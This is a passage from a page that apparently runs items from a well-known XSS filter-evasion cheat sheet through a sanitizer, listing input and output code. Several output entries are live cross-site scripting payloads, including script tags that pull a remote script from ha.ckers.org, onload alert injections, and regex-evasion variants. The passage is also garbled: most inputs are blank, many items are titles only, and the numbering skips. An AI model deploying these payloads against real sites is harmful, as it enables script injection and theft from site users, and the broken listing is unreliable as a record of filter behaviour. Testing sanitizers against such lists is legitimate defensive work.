49. Hex Encoding w/out Semicolons
50. Embedded Tab
51. Embedded Encoded Tab
52. Embedded Newline
53. Embedded Carriage Return
54. Multiline w/Carriage Returns
55. Spaces/Meta Chars
56. Non-Alpha/Non-Digit
Input code »
Output code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57. Non-Alpha/Non-Digit Part 2
Input code »
Output code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58. No Closing Script Tag
Input code »
Output code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
63. Malformed IMG Tags
Input code »
">
Output code »
<SCRIPT>alert("XSS")</SCRIPT>">
64. No Quotes/Semicolons
Input code »
Output code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
65. Evade Regex Filter 1
Input code »
Output code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66. Evade Regex Filter 2
Input code »
Output code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67. Evade Regex Filter 3
Input code »
Output code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68. Evade Regex Filter 4
Input code »
Output code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69. Evade Regex Filter 5
Input code »
Output code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70. Filter Evasion 1
Input code »
PT SRC="http://ha.ckers.org/xss.js">
Output code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71. Filter Evasion 2
Input code »
Output code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72. Mixed Encoding
Input code »
XSS
Output code »
XSS
73. JavaScript Link Location
Input code »
XSS
Output code »
XSS